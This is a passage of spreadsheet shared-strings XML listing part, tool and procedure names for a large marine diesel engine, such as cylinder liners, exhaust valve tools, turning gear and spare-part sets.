    <t>FIXING PIECE</t>
  </si>
  <si>
    <t>FLANGE PLATE</t>
  </si>
  <si>
    <t>LOWER COVER</t>
  </si>
  <si>
    <t>MEASURING DISC</t>
  </si>
  <si>
    <t>SENSOR ADAPTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COPPER PIPE L=0.2m</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING STUB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END ANGLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CONNECTION TERMINAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIVING SHAFT</t>
  </si>
  <si>
    <t>SHAFT SEAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TORSIOGRAPH DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREWED UNION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE BRACKET</t>
  </si>
  <si>
    <t>CABLE TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JUNCTION BOX</t>
  </si>
  <si>
    <t>CABLE PROTECTION RING</t>
  </si>
  <si>
    <t>DIFFERENCE PRESSURE SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTION BOX</t>
  </si>
  <si>
    <t>HOLDER 2-PARTS</t>
  </si>
  <si>
    <t>HOLDER HALF</t>
  </si>
  <si>
    <t>SADDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRONIC UNIT</t>
  </si>
  <si>
    <t>PLATE FOR PIPE BRACKET</t>
  </si>
  <si>
    <t>TERMINAL BOX, CABLE AND PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBL.&amp; DISMANTL/CYLINDER LINER</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBL.&amp; DISMANTLING, FLANGE MOTOR</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBL.&amp; DISMANTLING/ AIR COOLER</t>
  </si>
  <si>
    <t>ASSEMBL.&amp; DISMANTLING/ FLANGE MOTOR</t>
  </si>
  <si>
    <t>ASSY AND DISMANTL./COMPRES.SHIMS</t>
  </si>
  <si>
    <t>ASSY AND DISMANTL/CYLINDER LINER</t>
  </si>
  <si>
    <t>ASSY AND DISMANTLING/ PISTON</t>
  </si>
  <si>
    <t>GLAND BOX DISMANTLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC DISMANTLING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSP.A.REMOVAL OF BEAR.SHELL</t>
  </si>
  <si>
    <t>LOWER CONNECTING ROD BEARING</t>
  </si>
  <si>
    <t>LOWER INTERMEDIATE WHEEL</t>
  </si>
  <si>
    <t>RAIL VALVE EXCHANGE INSTRUCTIONS</t>
  </si>
  <si>
    <t>REMOV./ FITTING OF CONNECT. ROD</t>
  </si>
  <si>
    <t>REMOVAL &amp; FITTING OF BEARING COVER</t>
  </si>
  <si>
    <t>REMOVAL &amp; FITTING OF CONNECT. ROD</t>
  </si>
  <si>
    <t>TIGHT.A.LOOSENING THE JACK BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IMPACT RING SPANNER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLUGGING WRENCH, RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL GEN. RING SLUGGING WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL GENERAL ALLAN KEY</t>
  </si>
  <si>
    <t>EYE NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PILLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROD FOR PRESSURE TESTING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDLE SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WITH-DRAWING GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTION BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUPLING-SOCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTIONS TO FITTING SEQUENCE</t>
  </si>
  <si>
    <t>OIL DISTRIBUTOR</t>
  </si>
  <si>
    <t>PRESSUR GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY VALVE</t>
  </si>
  <si>
    <t>SHELL TYPE RATCHET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACCESSORY PARTS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>CROWFOOT WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX HEAD DRIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINING OF FOAMED MATERIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RUBBER PROTECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL GENERAL PRESSURE MEASUREMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORK WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WRENCH OPEN END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIXING STRAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX. HEAD SCREW DRIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RAIL</t>
  </si>
  <si>
    <t>TRACTION ROPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WOODEN CASE</t>
  </si>
  <si>
    <t>BACKING BUSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORK END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER INSIDE</t>
  </si>
  <si>
    <t>HOLDER OUTSIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC JACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOP VALVE</t>
  </si>
  <si>
    <t>SUPPORT INSIDE</t>
  </si>
  <si>
    <t>SUPPORT OUTSIDE</t>
  </si>
  <si>
    <t>THREADED FASTENER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING OF THE CRANKSHAFT</t>
  </si>
  <si>
    <t>PRONGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURNING OUT DEVICE</t>
  </si>
  <si>
    <t>SPRING CLIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE STEEL   SHARP EDGED</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>ANGLED LEVER</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>FORMED PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSIDE MICROMETER WITH CASE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>POSITIONING GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CARRIER BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL CYLINDER LINER INSULATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSHAFT-CHECKING EQUIPMENT</t>
  </si>
  <si>
    <t>SHIP CRANE HOOK  DIN 15401</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLET TWO PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING DEVICE</t>
  </si>
  <si>
    <t>RETAINING BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE ROPE SLING WITH HOOK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WOODEN BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPERATING INSTRUCTIONS</t>
  </si>
  <si>
    <t>ASSEMBLY</t>
  </si>
  <si>
    <t>BOLT CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTION HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSS ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INNER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE WELDED</t>
  </si>
  <si>
    <t>RETAINING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING PIPE</t>
  </si>
  <si>
    <t>TOOL CYL. COVER PRE-TENSIONING</t>
  </si>
  <si>
    <t>VENT SCREW</t>
  </si>
  <si>
    <t>HALF STEEL RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL RING HALF</t>
  </si>
  <si>
    <t>UPPER RING  2-PARTS</t>
  </si>
  <si>
    <t>TOOL EXHAUST VALVE FAILURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASIC STAND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">EXHAUST VALVE ROTATION DEVICE </t>
  </si>
  <si>
    <t>ROTATION DEVICE FOR EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING DEVICE FOR EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL INJECTION VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>CRANK SHAFT-MACHINING</t>
  </si>
  <si>
    <t>ASSEMBL.&amp; DISMANTLING,AXIAL DETUNER</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>TOOL TURNING GEAR PRE-TENSIONING</t>
  </si>
  <si>
    <t>COLUMN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING HOOK</t>
  </si>
  <si>
    <t>PRECISSION TUBE SEAMLESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QUICK PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RE-LUBRICATION</t>
  </si>
  <si>
    <t>TOOL CROSSHEAD BEARING LUBR.</t>
  </si>
  <si>
    <t>GIRDER FOR REMOVAL OF CONNECTING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVER ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT ROLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE BLOCK</t>
  </si>
  <si>
    <t>SIDE WALL LEFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIDE WALL RIGHT</t>
  </si>
  <si>
    <t>TOOL CONNEC. ROD BEARING INSPECTION</t>
  </si>
  <si>
    <t>UPPER STAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING-TOOL</t>
  </si>
  <si>
    <t>CONSOLE FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL BEAR. SHELL CRANK PIN ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL BEARING SHELL CRANK PIN ASSY</t>
  </si>
  <si>
    <t>HOLDING PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER TWO-PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISMANTLING AND ASSEMBLING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE PLATE</t>
  </si>
  <si>
    <t>LOCKING DEVICE</t>
  </si>
  <si>
    <t>PISTON HOLDER TWO PART</t>
  </si>
  <si>
    <t>PISTON SUPPORT/DISMANT.GLAND BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY CATCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORTING DEVICE</t>
  </si>
  <si>
    <t>TOOL PISTON/-ROD/CROSSHD.PRETENS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTING GEAR</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>KEY</t>
  </si>
  <si>
    <t>LOCATING SCREW</t>
  </si>
  <si>
    <t>TOOL GEAR WHEEL CRANKSHAFT ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDRICAL ROLLER BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ECCENTRIC SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FACE PLATE</t>
  </si>
  <si>
    <t>GUIDE ELEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTION RING</t>
  </si>
  <si>
    <t>PUSH ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROCKER ARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING ELEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TENSION NUT</t>
  </si>
  <si>
    <t>UPPER PLATE</t>
  </si>
  <si>
    <t>FITTING DEVICE</t>
  </si>
  <si>
    <t>MANDREL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PNEUMATIC IMPACT WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRE-TENSIONING DEVICE</t>
  </si>
  <si>
    <t>SLIDE DISK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL</t>
  </si>
  <si>
    <t>BODY</t>
  </si>
  <si>
    <t>HYDRAULIC FLEXIBLE TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTION ROD</t>
  </si>
  <si>
    <t>STOP ROD</t>
  </si>
  <si>
    <t>TOOL SUPPLY UNIT MAINTENANCE</t>
  </si>
  <si>
    <t>TRANSVERSE SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TENSION DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL SUPPLY UNIT PRE-TENSIONING</t>
  </si>
  <si>
    <t>ANGLE RAIL</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON CARRIER PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>POSITIONING UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL CAMS GEAR WHEEL ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CARRIAGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISMANTLING RAIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPHERICAL ROLLER BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEP ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBL.AND DISMANTL.OF THE MOT(motor?)</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>DOUBLE T-BROAD FLANGED BEAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING ELEMENT</t>
  </si>
  <si>
    <t>PULLEY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULLEY PLATE</t>
  </si>
  <si>
    <t>PULLEY SUPPORT</t>
  </si>
  <si>
    <t>ROPE ROLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVAL THIMBLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULLEY DEVICE</t>
  </si>
  <si>
    <t>LIFTING LUG FOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASIC MACHINE</t>
  </si>
  <si>
    <t>TOOL SUPPLY UNIT LUBRICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL BOX OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTENING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL HIGH PRESSURE PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>TOOL HIGH PRESSURE PIPE CLAW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL CRANK ANGLE SENSOR ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING CABLE WITH PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL EMERGENCY CYL. LUBRICATION</t>
  </si>
  <si>
    <t xml:space="preserve">ALIXILIARY MEANS FOR
BUTTERFLY VALVE </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING</t>
  </si>
  <si>
    <t>SPARE PART BOX  30 LITRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PARTS ENGINE CONTROL SYSTEM</t>
  </si>
  <si>
    <t>SHAFT ENCODER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAL SET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PARTS INJECTOR VALVE</t>
  </si>
  <si>
    <t>SPARE PARTS FUEL RAIL</t>
  </si>
  <si>
    <t>SPARE PARTS EVCU CONTROL VALVE</t>
  </si>
  <si>
    <t>SPHERICAL ROUND NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WEDGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPONGE RUBBER RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE COUPLING &amp; FLYWHEEL CASING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLYWHEEL CASING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CENTRING SLEEVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAMPING PART</t>
  </si>
  <si>
    <t>ENGINE STAYS HYDRAULIC TYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE STAYS/ FRICTION TYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING FLANSCH</t>
  </si>
  <si>
    <t>BUFFER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BAYONET PLUG MN-</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL BOX (LAMP)</t>
  </si>
  <si>
    <t>LAMP SEAT WELDING BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PC FOR ECR</t>
  </si>
  <si>
    <t xml:space="preserve">SECOND ORDER MOVEMENT COMPENSATOR </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MGO/MDO COOLING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER OIL HEAT TRACING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AVM CONTROL BOX</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>AVM SENSOR</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>AXIAL VIBRATION MONITOR ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SENSOR CLEANING FLUID</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADAPTER ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SENSORS SAC WHR-HT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OPERATION WITH DEFEC. TURBOCHARGERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RAKO CASE SYNTHETIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEAR FOR TIGHTENING COUPLING NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL VALVECAGE/L.CON.ROD PRETENS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER LINER WITH INSULATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INJECTION VALVE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST VALVE WITH SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER JACKET GROUPING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER JACKET ASSEMBLY PARTS</t>
  </si>
  <si>
    <t>FLAT CHAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER JACKET CENTRE PIECE</t>
  </si>
  <si>
    <t>END CYLINDER JACKET DE</t>
  </si>
  <si>
    <t>END CYLINDER JACKET DE MATERIAL ORDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END CYLINDER JACKET FE</t>
  </si>
  <si>
    <t>END CYLINDER JACKET FE MATERIAL ORDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER JACKET INTERMEDIATE PIECE</t>
  </si>
  <si>
    <t>LIGHT DUTY SPRING DOWEL PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUND RUBBER RING SEAMLESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SURFACE TEST SPECIFICATION</t>
  </si>
  <si>
    <t>INSULATION TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION TUBES CYLINDER LINER</t>
  </si>
  <si>
    <t>FILLING PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PASSAGE FOR LUBRICATING QUILL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATING QUILL</t>
  </si>
  <si>
    <t>CAST CYLINDER</t>
  </si>
  <si>
    <t>COVER HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING HALF</t>
  </si>
  <si>
    <t>JOINT RING 4-PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JOINT RING IN 4 PARTS</t>
  </si>
  <si>
    <t>OIL SCRAPER RING 3-PARTS</t>
  </si>
  <si>
    <t>RING SUPPORT 3-PARTS</t>
  </si>
  <si>
    <t>SCRAPER RING IN 4 PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TENSION SPRING</t>
  </si>
  <si>
    <t>DOWL PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ATOMIZER RETAINER</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>INJECTION VALVE COMPLETE WITHOUT SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TAPPET CARRIER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE PIPE</t>
  </si>
  <si>
    <t>INJECTION VALVE PIPES</t>
  </si>
  <si>
    <t>VALVE BUSH</t>
  </si>
  <si>
    <t>STARTING VALVE WITHOUT GASKET AND O-RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RELIEF VALVE COMBUSTION CHAMBER</t>
  </si>
  <si>
    <t>INDICATOR VALVE COMBUSTION CHAMBER</t>
  </si>
  <si>
    <t>ASSESS OF THE SURFACE ROUGHNESS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>BLIND FLANGE SQUARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FTPA_ MATERIAL SPECIFICATION</t>
  </si>
  <si>
    <t>MEASURING CONE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE COTTER KK56 H TWO-PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE COTTER TWO-PARTS</t>
  </si>
  <si>
    <t>WING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALANCE WEIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLAIN FLANGE D1A</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANK ANGLE SENSOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AXIAL- EXPANSION PIECE</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>BOA AXIAL EXPANSION PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITE METAL LINING WHITE METAL SPEC</t>
  </si>
  <si>
    <t>CYLINDER LOWER HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER UPPER HALF</t>
  </si>
  <si>
    <t>GASKET RING  2-PARTS</t>
  </si>
  <si>
    <t>GASKET RING 2-PARTS</t>
  </si>
  <si>
    <t>OIL-PIPING</t>
  </si>
  <si>
    <t>SQUARE GASKET</t>
  </si>
  <si>
    <t>WELDING NECK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WITHE METAL LINING</t>
  </si>
  <si>
    <t>GUARD CAP</t>
  </si>
  <si>
    <t>LUBRICANTS FLYWHEEL/PINION TEETH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLANETARY TURNING GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURNING GEAR  CYCLO-TYPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COUPLING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COPPER-TUBE</t>
  </si>
  <si>
    <t>FULCRUM  PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD PLATE</t>
  </si>
  <si>
    <t>GUIDE PIECE</t>
  </si>
  <si>
    <t>LABLES FOR TURNING GEAR SWITCH BOXES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STIRRUP PLATE</t>
  </si>
  <si>
    <t>CABLE  L= PER ORDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REMOTE CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SIGNAL LAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SWITCH BOX</t>
  </si>
  <si>
    <t>SCREW</t>
